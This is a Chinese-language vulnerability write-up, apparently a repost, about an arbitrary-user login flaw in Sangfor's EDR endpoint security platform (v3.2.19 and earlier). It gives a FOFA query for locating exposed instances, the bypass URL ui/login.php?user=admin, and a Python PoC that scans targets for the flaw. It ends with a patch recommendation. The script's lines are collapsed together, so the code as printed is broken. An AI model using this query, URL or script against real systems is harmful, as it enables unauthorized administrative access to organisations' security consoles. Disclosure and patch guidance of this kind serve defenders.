深信服EDR任意用户登录

文章目录

  • 深信服EDR任意用户登录
    • 1.深信服EDR简介
    • 2.漏洞描述
    • 3.影响版本
    • 4.fofa查询语句
    • 5.漏洞复现
    • 6.POC&EXP
    • 7.漏洞整改

深信服EDR任意用户登录

1.深信服EDR简介

微信公众号搜索:南风漏洞复现文库
南风网络安全公众号首发

终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。
  EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。
  端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服的 EDR产品也支持与AC、SIP、AF、SOC、X-central产品的联动协同响应,形成新一代的安全防护体系。

2.漏洞描述

深信服终端检测响应平台EDR可通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。深信服终端监测响应平台(EDR)存在任意用户登录漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以未授权访问该平台后台。

3.影响版本

EDR <= v3.2.19

4.fofa查询语句

app="SANGFOR-EDR"title="终端检测响应平台"

5.漏洞复现

漏洞链接:https://IP地址/ui/login.php?user=admin

深信服EDR任意用户登录

6.POC&EXP

poc用法格式

poc.py http://127.0.0.1/

#!usr/bin/env python
# *-* coding:utf-8 *-*
import requests
import json
import sys
def poc(arg):vuln_url = arg + 'ui/login.php?user=admin'headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)'}try:r = requests.get(vuln_url,headers=headers,verify=False,timeout=20,allow_redirects=False)if r.status_code == 302 and 'Location: index.php' in str(r.headers):print('存在漏洞:'+vuln_url)except Exception as e:print('出错:'+str(e))passurl=sys.argv[1]        
poc(url)

7.漏洞整改

深信服官方已发布更新版本和补丁,建议相关用户尽快升级至3.2.21版本或升级补丁修复漏洞


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部